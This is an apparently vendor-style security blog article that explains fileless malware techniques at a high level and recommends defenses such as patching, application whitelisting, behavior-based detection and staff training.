Beyond malware: Why it’s time to take the fileless threat seriously

A new report has revealed that detections of “fileless” threats soared 265% from the first half of 2018 to the first six months of this year. Separately, fileless attacks were ranked by IT security pros last year as second only to zero-day threats as “most likely to compromise the organization.” Yet although they offer a great opportunity for hackers to bypass traditional security filters, they can also be detected, blocked and mitigated with a few best practice steps.

What are fileless threats?

The term “fileless malware” is a little misleading because it’s something of a catch-all commonly used to refer to a range of quite diverse black hat techniques. Some even use files. Broadly speaking there are four different types of ‘fileless’ threat:

• Malicious documents feature embedded scripts or malicious code, allowing hackers to attack victims without deploying executables. This keeps them under the radar of many security tools.
• Malicious scripts can be executed directly through web browsers.
• Malicious code in memory means files are never written to disk, thus avoiding detection.
• Living off the land techniques inject malicious behavior into legitimate applications, disguising them from system and security tools.

Opportunity knocks

When it comes to living off the land, there is a multitude of legitimate Windows programs that can be abused for malicious ends. PowerShell is often targeted because it has full access to the OS and is frequently used by other programs, so disabling it is not an option for IT managers. Windows Management Instrumentation (WMI), PsExec, Visual Basic, Windows UAC Bypass and over 100 other tools could also be manipulated by hackers for their own ends.

Web pages, Office macros, Flash videos, phishing, malicious browser extensions, stolen user credentials and in-memory exploits have all been used in the past to launch fileless attacks. The sheer range of options open to cyber-criminals creates a large potential attack surface for security teams to defend against.

How does fileless threats affect my business?

Ultimately, these techniques are used to support whatever ends the attacker is trying to achieve. This could be:

Ransomware: the SamSam variant is often delivered via fileless techniques. Last year, the US Department of Justice claimed it had managed to infect hundreds of US organizations, costing them over $30m since 2015.

Banking trojans: Emotet and Trickbot both use fileless techniques to infect millions of organizations around the world.

Cryptojacking: cyber-criminals have used fileless attacks in the past to infect victim organizations with cryptocurrency mining malware.

Data breaches: it stands to reason that the longer a hacker can stay hidden, the more damage they can do to a targeted organization. In the case of multi-stage information-stealing attacks, this could result in significant extra losses for the victim. The average global “dwell time” – the length of time hackers remain undetected – currently stands at over 100 days.

Back to basics

A Ponemon Institute report from last year predicted that fileless malware would account for 38% of all attacks in 2019. However, the good news is that there are plenty of things organizations can do to mitigate this growing risk. Your watchword throughout should be “defense-in-depth” – so that if one particular strategy isn’t effective, you have more opportunities to catch that threat by other means.

Consider the following:

• Regular patching to reduce the number of vulnerabilities fileless threats might seek to exploit
• Whitelist applications to block malware and scripts from executing
• Disable macros and Flash to reduce the attack surface further
• Invest in advanced anti-malware tools that use behavior-based techniques rather than signatures to catch malware. This means they’re more likely to pick up on suspicious activity associated with fileless threats
• Tighten access controls and add two-factor authentication where possible for privileged accounts. This will help to halt the spread of malware across networks as there will be no passwords to steal/crack
• Run regular staff training and user awareness course, to reduce the opportunity for hackers to launch attacks via phishing emails. When done right, these efforts can turn your weakest link into a strong first line of defense

Ultimately, hackers use any tools at their disposal that will improve their chances of success. Fileless tools and techniques will only work as long as they keep the black hats hidden in the shadows. By paying attention to these increasingly popular hacking strategies, you can shine a light on their activity, so that they’ll hopefully move on to an easier target.